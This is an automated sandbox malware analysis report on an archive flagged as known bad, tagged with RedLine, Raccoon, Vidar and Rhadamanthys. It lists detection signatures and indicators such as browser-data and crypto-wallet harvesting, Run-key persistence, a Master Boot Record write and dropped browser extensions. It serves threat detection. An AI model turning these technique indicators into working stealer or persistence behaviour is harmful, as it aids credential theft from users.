Malware Analysis Report

2025-05-28 17:27

Sample ID 230115-vqcesshe44
Target infected.zip
SHA256 4c7081148a218b609dca62b2ce1106e4a2e075671b0fb64352056cd6e58e7873
Tags
gcleaner raccoon redline rhadamanthys eb3a206cd939601b2a6d00ea009a6d7e bootkit discovery infostealer loader persistence spyware stealer upx purecrypter downloader evasion trojan 8f25ed0aa267992c7856160c3951e20b vidar 814
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4c7081148a218b609dca62b2ce1106e4a2e075671b0fb64352056cd6e58e7873

Threat Level: Known bad

The file infected.zip was found to be: Known bad.

Malicious Activity Summary

RedLine payload

Modifies Windows Defender Real-time Protection settings

Vidar

Rhadamanthys

Raccoon

Windows security bypass

GCleaner

RedLine

PureCrypter

Detect rhadamanthys stealer shellcode

Suspicious use of NtCreateUserProcessOtherParentProcess

ACProtect 1.3x - 1.4x DLL software

Executes dropped EXE

Blocklisted process makes network request

Downloads MZ/PE file

UPX packed file

Uses the VBS compiler for execution

Reads user/profile data of web browsers

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Writes to the Master Boot Record (MBR)

Drops desktop.ini file(s)

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Drops Chrome extension

Accesses 2FA software files, possible credential harvesting

Looks up external IP address via web service

Checks for any installed AV software in registry

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Modifies registry class

Modifies data under HKEY_USERS

Checks processor information in registry

Delays execution with timeout.exe

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Runs ping.exe

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-15 17:12

Signatures

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:17

Platform

win10v2004-20220812-en

Max time kernel

212s

Max time network

225s

Command Line

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

Signatures

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A

GCleaner

loader gcleaner

Raccoon

stealer raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3996 created 2468 N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe C:\Windows\system32\taskhostw.exe

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\ScanRename\ScanRename.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\InfoInstall = "C:\\Users\\Admin\\AppData\\Roaming\\InfoInstall\\InfoInstall.exe" C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Documents\best_hack.zip_id23904541.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A53B1AB43B3D351517A14F4A651C94F1 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Windows\SysWOW64\is-752BJ.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A53B1AB43B3D351517A14F4A651C94F1 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\fontview.exe N/A
N/A N/A C:\Windows\SysWOW64\fontview.exe N/A
N/A N/A C:\Windows\SysWOW64\fontview.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3996 set thread context of 1952 N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Any Drive Formatter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\OdCkbftzuRPDCLooswR\xprHIYg.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-DL9FL.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-SM4I8.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-N3B0G.tmp C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\Documentation\Russian\is-U0NO9.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\Languages\is-TJ8E5.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
File created C:\Program Files (x86)\ScanRename\is-3LBDQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-HVIUU.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-EP9NM.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-JJNEH.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-B9TM5.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\unWhUoTpcLxwC\CqRtzkA.xml C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-3UEPQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File created C:\Program Files (x86)\OdCkbftzuRPDCLooswR\dsKYSUK.xml C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-23HT1.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-2L7CS.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-4O43K.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\Documentation\English\is-NUOFE.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-0OITV.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-06SNK.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-QQUHA.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\unWhUoTpcLxwC\BoOieqA.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\NxGlAgQUfzUn\PlxUODa.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-B4BFK.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-6KBKJ.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-4QSVS.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File opened for modification C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\cjNumber C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-F7CVS.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\WyuevociGfNU2\AzXfaRieDbpAf.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-109K0.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\WyuevociGfNU2\LzOYMrW.xml C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-TFLMS.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-CQUMN.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-17VQJ.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File opened for modification C:\Program Files (x86)\Reg Organizer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-QVMD2.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-44H7C.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-JV0OQ.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-TNG86.tmp C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File opened for modification C:\Program Files (x86)\ScanRename\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File opened for modification C:\Program Files (x86)\ScanRename\ScanRename.exe C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File created C:\Program Files (x86)\XxxUzwYQU\zfRebA.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\XxxUzwYQU\GnbMyEB.xml C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-7OO28.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-HTHBB.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-M0UH9.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-67BUK.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-GORKS.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-LN7NC.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-NHVQB.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-R7RB9.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\YQwpFizkoQMsJvRhq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bGAvhKhnIPTNQeobsw.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\YESfVrKgbFKcjSeIN.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\iwOiVBtjWoVYUMW.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\SysWOW64\fontview.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\SysWOW64\fontview.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\fontview.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\fontview.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\fontview.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
